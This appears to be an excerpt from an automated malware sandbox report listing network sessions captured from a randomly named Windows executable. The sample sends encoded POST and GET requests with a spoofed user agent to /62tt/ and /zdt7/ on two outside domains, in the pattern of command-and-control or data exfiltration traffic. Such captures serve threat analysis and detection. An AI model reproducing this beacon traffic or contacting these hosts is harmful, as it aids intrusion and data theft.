                                                                                  Server: Apache
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  X-Newfold-Cache-Level: 2
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  Content-Length: 1167
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                  Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM
                                                                                  Nov 15, 2024 06:46:33.603565931 CET329INData Raw: 0a f7 01 48 2a 4c 97 bd 49 74 86 6c 5b c8 33 0a 03 71 d8 f7 7d 7e 62 26 a7 06 41 1e af 45 d9 69 a3 78 4f 28 5c 42 41 9e 2e 43 12 b7 ee b4 02 91 b1 48 e6 85 b8 c9 de 94 46 da 9b 6c 14 ca 22 3a b0 e0 49 51 da 01 de 0f 9f 3b 34 06 fb 6c fb 1c 7b f2
                                                                                  Data Ascii: H*LItl[3q}~b&AEixO(\BA.CHFl":IQ;4l{$&#vBmQz"3p6`)uBn?`_Ca>w=Ox^=l2^_7GV5dB;SxCGyE?RZieNKy26d{n~,6:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  16192.168.2.2249177162.241.63.7780172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:35.416665077 CET2472OUTPOST /62tt/ HTTP/1.1
                                                                                  Host: www.estrela-b.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.estrela-b.online
                                                                                  Referer: http://www.estrela-b.online/62tt/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 3624
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 37 63 35 58 52 59 62 6d 77 4d 61 44 35 48 4d 57 50 50 2f 4e 6a 49 72 31 71 69 57 36 5a 42 34 4d 61 42 43 32 45 46 30 34 48 2f 79 5a 77 63 4c 68 78 38 39 6e 6f 78 71 4a 4d 55 54 4e 53 54 63 57 4e 35 4b 66 62 33 47 4b 66 4b 36 30 6a 6c 36 54 6d 65 72 68 37 71 59 4b 42 48 54 47 6b 65 31 65 75 4b 49 35 33 51 4e 7a 32 37 36 57 71 33 44 37 43 55 46 50 6a 54 30 55 53 57 59 51 53 79 4d 73 6b 4b 55 6e 51 76 2b 47 45 6e 44 55 69 4a 4c 6e 75 37 45 48 69 70 6e 71 47 52 62 4b 32 48 37 45 37 49 44 51 65 6e 52 4f 44 51 6b 39 49 46 58 72 67 79 69 57 67 56 45 31 6e 64 6b 4a 6a 51 72 6b 57 33 58 4d 70 6f 42 51 71 67 54 64 4a 74 43 41 79 41 46 44 6a 31 4d 43 42 35 76 72 78 65 73 44 59 77 69 4f 47 36 63 63 4d 50 7a 76 63 78 77 75 54 72 68 64 2b 6b 72 44 58 66 50 37 4e 52 57 4b 30 79 56 46 6e 55 65 57 45 4a 61 58 36 47 59 6a 44 68 2f 54 77 76 68 48 71 38 32 4c 4e 59 52 58 66 32 74 64 6e 63 54 63 44 56 73 65 79 47 44 55 67 56 44 78 4f 61 67 76 58 4b 76 50 58 72 41 31 48 78 70 62 76 72 4b 49 63 49 41 69 77 35 [TRUNCATED]
                                                                                  Data Ascii: 5RH=7c5XRYbmwMaD5HMWPP/NjIr1qiW6ZB4MaBC2EF04H/yZwcLhx89noxqJMUTNSTcWN5Kfb3GKfK60jl6Tmerh7qYKBHTGke1euKI53QNz276Wq3D7CUFPjT0USWYQSyMskKUnQv+GEnDUiJLnu7EHipnqGRbK2H7E7IDQenRODQk9IFXrgyiWgVE1ndkJjQrkW3XMpoBQqgTdJtCAyAFDj1MCB5vrxesDYwiOG6ccMPzvcxwuTrhd+krDXfP7NRWK0yVFnUeWEJaX6GYjDh/TwvhHq82LNYRXf2tdncTcDVseyGDUgVDxOagvXKvPXrA1HxpbvrKIcIAiw5MbqMEXgRQeRjILl8pXO95vdCS7EV/Oh0ZheFja0PFezDHHN2h0kjuPRnz1/oQmS/PTKCm4QSy/bUsEL0mIm912QW9WxgN0qSRzeg7ynh3A2+a1RS0SnGcQsNBOmj1Vz92O8UR4bPhKniD9YFzhf2EZkxG1LZeNMTeYPefnoQXkIqYc1E8dtjMU5vqtG3qNGBteZJA/DVvxE2PPCPCXjOGXtOZowdaogpDadN7vTt1KAPVEstB63TGGk51aD87xBfqAXndT18CWVub+APnIHXb/79hVRP+5d6//hLvt7fns2JG/qnwSGV9Naxrc3mucK0PBf5Vvluwaz3i8v9PhefXnm1vWj5BFfBXlNHAzC7JrRPHmDzWEkdtQcC/yzHUTnXd0q5k8mY7T1yoQcgvpngH2DVA4n5kWlMmjKkoRUVJuqAaYGfs+mpesX8oohABhW+zHTyhZMqpopUT+vh+u6DXRsFHmdFhweWuSUUTWvtK7yLyVs4mq1CLNAjZ0QnIyvmppkQG8Zan1977C/JaczlsUPaEehEMcHHAr4kyCGfw17P4YWadm8YO9A1GjxbOiGkPu7SyzTOlawJXxI4y+O7pUhr/MP6J+tLx1uioyO+qlD2GxLVM/Pg9MhhJaQbbmDzQTaY/TFO5WT6O3VwdUk1PP7Tk7byfFnMio [TRUNCATED]
                                                                                  Nov 15, 2024 06:46:35.421690941 CET1634OUTData Raw: 4f 42 49 4b 5a 43 54 37 6a 4e 48 6f 67 4a 4b 54 5a 71 79 31 79 46 64 39 77 31 74 33 69 73 67 6d 34 56 50 65 4f 4a 4f 42 37 41 62 69 32 65 47 44 31 57 38 51 56 6a 73 65 71 37 73 57 77 63 75 61 39 5a 75 57 62 6b 76 67 62 51 45 54 58 46 79 4d 76 42
                                                                                  Data Ascii: OBIKZCT7jNHogJKTZqy1yFd9w1t3isgm4VPeOJOB7Abi2eGD1W8QVjseq7sWwcua9ZuWbkvgbQETXFyMvB9xpHijkgxikI2VmabNiuZG2V0gWPNbnYZWO42tfC4rrNI46Ry9p9q2iiXi3j9eWlFI3Re6B+t5YTdBK39Awtx2R+ulo50mtmZ/AFFOPteSp7dS7+cWaopJxV/cWGA2d/a/5AB2BBlvSot+yXIzdQKiGvxj+V6CLzP
                                                                                  Nov 15, 2024 06:46:36.134892941 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:35 GMT
                                                                                  Server: Apache
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade
                                                                                  Vary: Accept-Encoding
                                                                                  Content-Encoding: gzip
                                                                                  X-Newfold-Cache-Level: 2
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  Content-Length: 1167
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 f1 d2 3d 38 b2 8b ae 1b da 01 eb 56 ac 03 8a 3d 15 94 78 2d b1 a1 78 39 92 b2 ec 0e fd ef bb d4 87 eb 24 ed d0 75 42 02 c9 f7 f3 dc 73 4e f1 e0 c7 df 9e fe f1 e7 cb 9f 58 13 5b b3 5d 14 e9 c5 8c b4 f5 26 73 91 ff f0 7b b6 5d 5c 14 0d 48 45 ef 8b a2 85 28 99 95 2d 6c b2 bd 86 de a1 8f 19 ab d0 46 b0 71 93 f5 5a c5 66 a3 60 af 2b e0 c3 8f ec 6e 97 c7 12 63 38 eb b1 a8 ad 82 c3 b7 cc e2 0e 8d c1 3e 63 62 68 8a 3a 1a d8 be 80 8e 05 1d 81 3d 6c 95 0c cd 35 7b 8a ad b6 35 7b 85 68 0b 31 d6 a4 ea 50 79 ed 22 0b be da 64 4d 8c 6e 2d 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 38 bd f2 b7 21 db 16 62 1c 33 4e 8c 47 03 2c 1e 1d a1 8e 70 88 a2 0a 54 f2 0d fb 7b c1 e8 29 f1 c0 83 7e 47 50 d6 f4 ed 15 78 4e a1 eb 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 4f d6 bc 5f 2c 4a 54 c7 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e cd fa 86 18 19 47 4d 91 d2 50 d1 18 c1 3d f8 1d f1 c8 0f 6b d6 68 a5 c0 8e f1 56 fa 5a db 35 5b [TRUNCATED]
                                                                                  Data Ascii: R]o6}a}F=8V=x-x9$uBsNX[]&s{]\HE(-lFqZf`+nc8>cbh:=l5{5{h1Py"dMn-H^h zL W8!b3NG,pT{)~GPxN![|FO_,JTynjUB~GMP=khVZ5[titm9lUE<mzR7VS-mP}=Tjd9Nu0lVK7Ci%,h$3iA;}u=i#uvqi631$2{bLCdw<thu1Y!xip#M;IGj=?:WGtyINO)8T#vUe5[iP5WS{x>u>JL2Sn`'AK7]-@MB/DGEz"y0l fdMn-H9 ~3RhX^ q]D86BxU(QSPzdl,j24zMc.1Se\n_g/=^T>WVSM
                                                                                  Nov 15, 2024 06:46:36.134943008 CET329INData Raw: 0a f7 01 48 2a 4c 97 bd 49 74 86 6c 5b c8 33 0a 03 71 d8 f7 7d 7e 62 26 a7 06 41 1e af 45 d9 69 a3 78 4f 28 5c 42 41 9e 2e 43 12 b7 ee b4 02 91 b1 48 e6 85 b8 c9 de 94 46 da 9b 6c 14 ca 22 3a b0 e0 49 51 da 01 de 0f 9f 3b 34 06 fb 6c fb 1c 7b f2
                                                                                  Data Ascii: H*LItl[3q}~b&AEixO(\BA.CHFl":IQ;4l{$&#vBmQz"3p6`)uBn?`_Ca>w=Ox^=l2^_7GV5dB;SxCGyE?RZieNKy26d{n~,6:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  17192.168.2.2249178162.241.63.7780172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:37.955368996 CET419OUTGET /62tt/?WrGp=yRUDttthc40H6jfP&5RH=2eR3StT9zNfU5ywXH4HggrTvpCnGbiZlVhDhLCkeE+XsifzX8e14uD6eFFfqVh5KNZSia3m0bcXelGS5q93MwJAmLErFoJd5x6JI2SQSwqfyhCjpW3AVwzoSZD5r HTTP/1.1
                                                                                  Host: www.estrela-b.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Nov 15, 2024 06:46:39.083221912 CET586INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Fri, 15 Nov 2024 05:46:39 GMT
                                                                                  Server: nginx/1.23.4
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 0
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  X-Redirect-By: WordPress
                                                                                  Location: http://estrela-b.online/62tt/?WrGp=yRUDttthc40H6jfP&5RH=2eR3StT9zNfU5ywXH4HggrTvpCnGbiZlVhDhLCkeE+XsifzX8e14uD6eFFfqVh5KNZSia3m0bcXelGS5q93MwJAmLErFoJd5x6JI2SQSwqfyhCjpW3AVwzoSZD5r
                                                                                  X-Newfold-Cache-Level: 2
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  X-Server-Cache: true
                                                                                  X-Proxy-Cache: MISS
                                                                                  Nov 15, 2024 06:46:39.293298960 CET586INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Fri, 15 Nov 2024 05:46:39 GMT
                                                                                  Server: nginx/1.23.4
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 0
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  X-Redirect-By: WordPress
                                                                                  Location: http://estrela-b.online/62tt/?WrGp=yRUDttthc40H6jfP&5RH=2eR3StT9zNfU5ywXH4HggrTvpCnGbiZlVhDhLCkeE+XsifzX8e14uD6eFFfqVh5KNZSia3m0bcXelGS5q93MwJAmLErFoJd5x6JI2SQSwqfyhCjpW3AVwzoSZD5r
                                                                                  X-Newfold-Cache-Level: 2
                                                                                  X-Endurance-Cache-Level: 2
                                                                                  X-nginx-cache: WordPress
                                                                                  X-Server-Cache: true
                                                                                  X-Proxy-Cache: MISS


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  18192.168.2.2249179141.193.213.1180172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:49.246666908 CET2472OUTPOST /zdt7/ HTTP/1.1
                                                                                  Host: www.meanttobebroken.org
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.meanttobebroken.org
                                                                                  Referer: http://www.meanttobebroken.org/zdt7/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 2160
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 44 66 61 7a 76 70 70 51 61 4c 44 51 46 36 57 57 6e 6e 44 74 42 6f 72 30 2b 43 45 51 68 42 54 32 79 73 6b 4c 47 79 69 32 71 39 64 74 45 72 37 48 41 52 6b 55 62 41 6b 77 71 44 4a 58 4a 56 39 70 59 74 68 5a 65 55 46 6a 37 71 4a 41 68 37 62 69 5a 7a 33 50 68 69 70 37 62 31 74 41 72 41 78 48 6f 64 38 57 6e 4f 6c 66 59 34 64 63 38 34 79 64 45 61 63 2f 58 76 33 33 79 38 59 67 47 6b 2b 61 6f 4a 54 31 6e 61 50 4c 4d 6e 34 71 34 68 74 6d 56 52 58 57 64 31 55 77 48 39 2b 73 6e 50 4d 63 51 53 58 50 36 42 5a 6e 69 4a 48 77 6d 5a 6f 49 48 79 42 51 4d 6f 43 6d 4f 45 70 6c 32 32 32 41 4e 67 6f 61 33 44 4a 54 45 68 6e 33 6d 57 55 32 78 42 42 45 68 4f 75 57 74 61 39 76 6c 4f 67 44 48 66 53 4d 41 4d 32 7a 38 31 4b 56 70 34 39 58 71 39 78 76 33 76 42 57 31 4b 69 4f 65 57 55 39 63 64 6b 62 6d 63 4e 64 75 51 4e 71 75 69 4f 75 74 48 5a 6b 31 6a 32 32 77 53 4c 7a 6f 42 6b 42 4b 36 6f 77 30 4a 67 33 69 65 73 65 44 32 4b 5a 43 52 52 59 51 53 62 6b 33 76 44 59 67 6f 4d 2b 71 66 2b 2f 4a 75 51 37 4b 41 74 4a 62 49 [TRUNCATED]
                                                                                  Data Ascii: 5RH=DfazvppQaLDQF6WWnnDtBor0+CEQhBT2yskLGyi2q9dtEr7HARkUbAkwqDJXJV9pYthZeUFj7qJAh7biZz3Phip7b1tArAxHod8WnOlfY4dc84ydEac/Xv33y8YgGk+aoJT1naPLMn4q4htmVRXWd1UwH9+snPMcQSXP6BZniJHwmZoIHyBQMoCmOEpl222ANgoa3DJTEhn3mWU2xBBEhOuWta9vlOgDHfSMAM2z81KVp49Xq9xv3vBW1KiOeWU9cdkbmcNduQNquiOutHZk1j22wSLzoBkBK6ow0Jg3ieseD2KZCRRYQSbk3vDYgoM+qf+/JuQ7KAtJbIASqWyySHguQ1vokz3+GWuueZlGpBR6EhtIM0l/uLYrs0Z/H76x6cgeHWiLAcFIAXtFSB0CWzQT/+GHGbfwUiXO7N10LdU5sBYoOuPunErXZdIrnPXHv9DCnRH9jW0lQlpMrizZApiv+BoNpGBn8xFw7BRjQEz8yF2YhtYumNCls+lReFJEWwiL2ylgLGykI6uLElMlpSoDFNmzRN2JX25cRMPJMyA/rCs0mQdzPaQkj958rlJSPpL1fyvnMjekEIRtvJd21RaPf/EAc4vFEv8AjQCDUJGnEkEXn0aNJPvcajG6wlL/jd06MtleDFxC73eZTmy28DFue7IG/BqImme/z03s0Vpgc82Ms1fMvpKOOG4kro1qLwaqv6MI6uBNLQeZuE03HfMVD2YTt7oyZsbMzsNvzlmUQ55mDnCofRPMkOQln6uTUOhAdBbZ/mqyQ4LpOE9zLcyoorDLhj+hCrLxZRJRi+ErDKqsV9oVtAZOfLsAwgEAUBv9YVRW5qTxXguU3FXqGUF88uU0ZS7LBYkyPMut+tr4AIP0rm+Bh2OPnInCXi4lU4U76n8LUNB1LxwGh/NZPZ7uE6sWE9ww8I9SonX3yrIJrIL67ziKN0sXmBoSh6TLNeQW1MPYSiln6UVsVis0NNwL1WMbMM9J85hyY2NVYXjmIavU [TRUNCATED]
                                                                                  Nov 15, 2024 06:46:49.251743078 CET179OUTData Raw: 43 6d 67 62 61 71 48 61 4f 33 71 70 33 59 6a 33 52 54 79 6a 57 53 66 74 73 70 30 74 36 53 46 4d 68 58 63 56 61 66 79 30 31 6e 63 44 35 47 77 4b 49 72 64 49 61 5a 79 68 52 5a 4a 65 4a 6a 56 68 32 6f 64 36 47 58 77 72 57 30 66 65 61 68 55 59 64 6b
                                                                                  Data Ascii: CmgbaqHaO3qp3Yj3RTyjWSftsp0t6SFMhXcVafy01ncD5GwKIrdIaZyhRZJeJjVh2od6GXwrW0feahUYdk487SsxUIsCF6a60vknRnO5YsXxKP5XYT/Wa0dd0BiXjR8nty4kWU7pM80fYnGQ0F6BdxI5kSn3VimMVLhr8ivRI/P/jfaq5cA
                                                                                  Nov 15, 2024 06:46:49.932040930 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:49 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Vary: Accept-Encoding
                                                                                  x-powered-by: WP Engine
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  Link: <https://meanttobebroken.org/wp-json/>; rel="https://api.w.org/"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e2cf16d0d2f4772-DFW
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Data Raw: 31 36 65 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d4 3c db 72 db 38 96 cf f6 57 c0 4c 8d 2d 4e 78 d7 c5 b6 24 3a dd 49 a7 a7 b2 db e9 f4 76 9c 9a da 8a 53 2e 88 84 28 d8 24 c1 06 20 cb 1a b5 5e f6 2f f6 69 7f 71 3f 61 eb 00 94 44 c9 94 ac d8 9e dd da 54 b7 6d 02 e7 8e 73 0e 6e 3c ec 1f c5 2c 92 d3 82 a0 91 cc d2 8b c3 3e fc 42 29 ce 93 d0 20 b9 fd e5 b3 01 6d 04 c7 17 87 07 fd 8c 48 8c a2 11 e6 82 c8 d0 f8 72 f9 b3 7d 66 2c db 73 9c 91 d0 b8 a3 64 52 30 2e 0d 14 b1 5c 92 5c 86 c6 84 c6 72 14 c6 e4 8e 46 c4 56 0f 16 a2 39 95 14 a7 b6 88 70 4a 42 5f 51 49 69 7e 8b 38 49 43 a3 e0 6c 48 53 62 a0 11 27 c3 d0 18 49 59 88 ae eb 26 59 91 38 8c 27 ee fd 30 77 fd 4d 24 21 a7 29 11 23 42 e4 26 de 58 10 07 54 bc a5 d2 c9 89 74 59 cc 4e 87 f4 c6 89 84 30 2e 0e d7 88 e0 a2 48 89 2d d9 38 1a d9 34 62 b9 81 04 fd 07 11 a1 e1 9f 79 f7 fe 99 57 25 dd 75 dd 8c e0 5c 4a 36 20 03 ce 6e 49 ae 84 9b 14 76 a9 ba 2b 47 24 23 c2 c5 64 90 49 39 70 87 f8 0e 68 ba 9b 4c 9c 22 4f 36 94 d1 bc 41 e8 d0 a0 19 4e 88 0b 30 0b 61 9a c1 [TRUNCATED]
                                                                                  Data Ascii: 16e1<r8WL-Nx$:IvS.($ ^/iq?aDTmsn<,>B) mHr}f,sdR0.\\rFV9pJB_QIi~8IClHSb'IY&Y8'0wM$!)#B&XTtYN0.H-84byW%u\J6 nIv+G$#dI9phL"O6AN0a}3xQr{r(5rd8C"0TgBKm9/1vAG%)=E%M;0jy&?#Fc,Isl!"8cbR[?c1jN9Bb.OLN&',It"/iFEH.Fh>%x;8#a~YM;'X!L+N(<)'oNu=98XL(|Lz7Q(,d2qeLXj8<yM_io\b\.!qc";7lb,6U:GO
                                                                                  Nov 15, 2024 06:46:49.932059050 CET1236INData Raw: df 9d 98 bd be 5b 9a 5b db 1e c6 e6 7d 1e 6f 1b 9f b5 c1 3e e1 6c c0 a4 38 59 8e f3 49 ce 68 1e 93 7b 0b 0d 59 9a b2 c9 09 72 15 0a 10 bd 1c 51 81 c0 f1 11 15 88 15 92 66 f4 1f 24 46 13 2a 47 48 8e 08 fa 77 86 85 44 9f df 7f 42 45 3a 4e 68 8e ee
                                                                                  Data Ascii: [[}o>l8YIh{YrQf$F*GHwDBE:Nh#-5eq U%)'L!1G$VO44XM&S(U`[]]+!$JghD2l'#bf8K42~3a
                                                                                  Nov 15, 2024 06:46:49.932075024 CET424INData Raw: 9e 91 0c b3 27 d5 9e 87 58 d2 89 c9 90 f0 f0 c8 b3 a8 03 27 39 0e 2e 0a 92 c7 ef 46 34 8d 1b d2 9c d7 99 f9 37 ce 32 2a c8 f1 71 83 85 c6 a4 78 5f 9d d4 3e eb 5c 2b 0c 4b 84 5f 75 44 5a a5 57 7c b3 72 a7 4c c5 22 9c a9 98 97 23 9a 27 dd 23 cf 5a
                                                                                  Data Ascii: 'X'9.F472*qx_>\+K_uDZW|rL"#'#Z=H!N1-_qqP!ah?}Na8&akaej k56fd13fHNJ~~ukyCNuR3RmLN8NyC{3ykmJ=
                                                                                  Nov 15, 2024 06:46:49.932132959 CET1236INData Raw: 39 22 e6 2a e0 be ca 6f 21 f9 2a ab 31 e8 ac 82 2e ac 6d 3d 3e 5e c3 b7 74 38 1f 85 a1 04 d7 ad c3 58 05 6f f8 48 ff 06 6d b3 f7 6c 7a 47 15 08 10 d4 ca 9d 9f 3e 7d 84 6c 3c 0d 8f 7c 2b 77 38 fc f9 0e a7 e9 00 47 b7 d5 58 af 02 7a f3 07 66 5d ad
                                                                                  Data Ascii: 9"*o!*1.m=>^t8XoHmlzG>}l<|+w8GXzf]EjjD-s673GN?W>,LydZ[ fpCrG[>7iqF4KIadj!xThvxpS[.Hf`.YM-F8fnx"d=j
                                                                                  Nov 15, 2024 06:46:49.932146072 CET1236INData Raw: 76 80 9c 79 5d d4 76 bc 4e 0d 88 5a 77 db 76 8e e5 98 e3 b4 8b 3a c5 bd fa ff bc b8 47 2a 83 7b 16 2a ff 73 02 73 0b 76 4c 48 d1 45 3e 9c 6e aa 1f 6d af 06 bb b5 0d 5b 8c 30 2f 56 9c bd ef e1 cc c6 12 bc 32 5e 47 b7 9b 0b 1a 10 79 68 f5 c3 37 ad
                                                                                  Data Ascii: vy]vNZwv:G*{*ssvLHE>nm[0/V2^Gyh7%:SS:Pax%'i&4^x6mx7=@~Nd"K W-7%W1hNlrtNAJ;P*fGE[]\gm
                                                                                  Nov 15, 2024 06:46:49.932257891 CET1033INData Raw: 6b 2e 6b 5a 39 15 2e a5 62 eb 1e af fa 4b f3 2f c4 28 2e 3e 48 94 32 76 2b 50 4a 6f 55 c9 3e bc 55 8f 26 58 94 a5 fb 58 22 09 6f 23 c3 07 01 40 77 07 7d c4 d3 01 41 92 4f 11 bc a9 cd 86 ea eb 05 90 36 05 1a 90 94 4d 10 e3 08 23 5d f2 fd a6 ef 16
                                                                                  Data Ascii: k.kZ9.bK/(.>H2v+PJoU>U&XX"o#@w}AO6M#]ZqC(#rUDcL$(/t<2xA_U9!dGd,G#HQ~DQm<;,ZKKL+=qB$!a2)


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  19192.168.2.2249180141.193.213.1180172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:51.825177908 CET690OUTPOST /zdt7/ HTTP/1.1
                                                                                  Host: www.meanttobebroken.org
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.meanttobebroken.org
                                                                                  Referer: http://www.meanttobebroken.org/zdt7/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 44 66 61 7a 76 70 70 51 61 4c 44 51 46 39 43 57 6f 56 6e 74 42 49 72 30 2f 43 45 51 72 68 53 39 79 73 6f 44 47 33 43 6d 71 4d 46 74 45 62 4c 48 63 79 63 55 59 41 6b 33 69 6a 4a 54 57 46 39 77 59 74 67 4b 65 56 35 6a 37 72 70 41 6a 59 6a 69 56 69 33 4d 2b 69 70 35 51 56 74 46 72 41 31 30 6f 64 41 34 6e 49 64 66 59 36 35 63 37 34 69 64 47 34 45 2f 52 66 32 38 6a 73 59 4e 47 6b 7a 4f 6f 4a 44 39 6e 62 7a 4c 4e 53 45 71 35 77 4e 6d 66 67 58 57 58 56 55 6b 41 39 2f 70 70 50 5a 69 57 78 4c 56 37 43 74 65 2f 4c 48 32 6d 5a 39 46 64 7a 70 4b 43 74 4b 75 57 44 51 5a 33 6d 66 53 5a 77 3d 3d
                                                                                  Data Ascii: 5RH=DfazvppQaLDQF9CWoVntBIr0/CEQrhS9ysoDG3CmqMFtEbLHcycUYAk3ijJTWF9wYtgKeV5j7rpAjYjiVi3M+ip5QVtFrA10odA4nIdfY65c74idG4E/Rf28jsYNGkzOoJD9nbzLNSEq5wNmfgXWXVUkA9/ppPZiWxLV7Cte/LH2mZ9FdzpKCtKuWDQZ3mfSZw==
